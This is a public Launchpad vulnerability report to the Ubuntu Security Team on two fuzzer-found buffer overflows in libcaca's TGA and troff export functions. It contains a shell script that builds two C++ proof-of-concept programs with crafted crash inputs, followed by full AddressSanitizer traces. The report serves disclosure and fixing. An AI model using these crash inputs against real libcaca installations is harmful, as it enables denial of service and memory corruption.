** Information type changed from Private Security to Public Security -- https://bugs.launchpad.net/bugs/1923273
Title: libcaca buffer-overflow Status in libcaca package in Ubuntu: New Bug description: Hello Ubuntu Security Team, I used libFuzzer to test the libcaca API and found two crashes: - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ------------------------------------------------------------------------ ## Vendor of Product https://github.com/cacalabs/libcaca ------------------------------------------------------------------------ ## Affected Product Code Base libcaca e4968ba ------------------------------------------------------------------------ ## Affected Component affected component: libcaca.so ------------------------------------------------------------------------ ## Affected source code file affected source code file (as reported in the two ASan call stacks below; export_tga() and export_troff() are reached in separate runs, not in one chain): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory() in libcaca/caca/codec/export.c -> export_tga() in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ------------------------------------------------------------------------ ## Attack Type Context-dependent ------------------------------------------------------------------------ ## Impact Denial of Service true (the tga trace below reports a 1-byte heap WRITE past an 18-byte allocation; the troff trace reports an 8-byte READ past the 128-byte 'ansi2troff' global) ------------------------------------------------------------------------ ## Reference https://github.com/cacalabs/libcaca ------------------------------------------------------------------------ ## Discoverer fdgnneig ------------------------------------------------------------------------ ## Verification process and POC ### Verification steps: 1. Get the source code of libcaca. 2. Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make ``` 3. Run POC.sh to compile poc_troff.cc and poc_tga.cc. 4. Run the two POC binaries (poc_troff, poc_tga). ------------------------------------------------------------------------ POC.sh ```shell cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include <assert.h> #include 
<stdio.h> #include <stdlib.h> #include <string.h> #include <fstream> #include <iostream> using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",&len); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include <assert.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fstream> #include <iostream> using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",&len); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = 
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_tga.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_tga ``` ------------------------------------------------------------------------ The output is as follows ```shell ==1845495==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000022 at pc 0x7f905c1bf440 bp 0x7ffdb0a31310 sp 0x7ffdb0a31308 WRITE of size 1 at 0x603000000022 thread T0 #0 0x7f905c1bf43f in export_tga /home/hh/Downloads/libcaca/caca/codec/export.c:961:12 #1 0x7f905c1bf43f in caca_export_memory /home/hh/Downloads/libcaca/caca/codec/export.c:117:16 #2 0x4c6d46 in LLVMFuzzerTestOneInput /home/hh/Downloads/libcaca/poc_tga.cc:29:18 #3 0x4c6e1c in main /home/hh/Downloads/libcaca/poc_tga.cc:44:2 #4 0x7f905bc0e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #5 0x41c39d in _start (/home/hh/Downloads/libcaca/poc_tga+0x41c39d) 0x603000000022 is located 0 bytes to the right of 18-byte region [0x603000000010,0x603000000022) allocated by thread T0 here: #0 0x494add in malloc (/home/hh/Downloads/libcaca/poc_tga+0x494add) #1 0x7f905c1be0eb in export_tga /home/hh/Downloads/libcaca/caca/codec/export.c:944:18 #2 0x7f905c1be0eb in caca_export_memory /home/hh/Downloads/libcaca/caca/codec/export.c:117:16 #3 0x4c6d46 in LLVMFuzzerTestOneInput /home/hh/Downloads/libcaca/poc_tga.cc:29:18 #4 0x4c6e1c in main /home/hh/Downloads/libcaca/poc_tga.cc:44:2 #5 0x7f905bc0e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/export.c:961:12 in export_tga Shadow bytes around the buggy address: 0x0c067fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fc0: 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c067fff8000: fa fa 00 00[02]fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1845495==ABORTING ``` ```shell ==1845916==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f28d47e8140 at pc 0x7f28d46fb799 bp 0x7ffe8c4ce450 sp 0x7ffe8c4ce448 READ of size 8 at 0x7f28d47e8140 thread T0 #0 0x7f28d46fb798 in export_troff /home/hh/Downloads/libcaca/caca/codec/export.c:1029:48 #1 0x7f28d46fb798 in caca_export_memory /home/hh/Downloads/libcaca/caca/codec/export.c:120:16 #2 0x4c6d46 in LLVMFuzzerTestOneInput /home/hh/Downloads/libcaca/poc_troff.cc:29:18 #3 0x4c6e1c in main /home/hh/Downloads/libcaca/poc_troff.cc:44:2 #4 0x7f28d414a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #5 0x41c39d in _start (/home/hh/Downloads/libcaca/poc_troff+0x41c39d) 0x7f28d47e8140 is located 0 bytes to the right of global variable 'ansi2troff' defined in 'codec/export.c:1015:33' (0x7f28d47e80c0) of size 128 SUMMARY: 
AddressSanitizer: global-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/export.c:1029:48 in export_troff Shadow bytes around the buggy address: 0x0fe59a8f4fd0: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 0x0fe59a8f4fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f4ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5010: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 =>0x0fe59a8f5020: 00 00 00 00 00 00 00 00[f9]f9 f9 f9 00 00 00 00 0x0fe59a8f5030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1845916==ABORTING ``` Thanks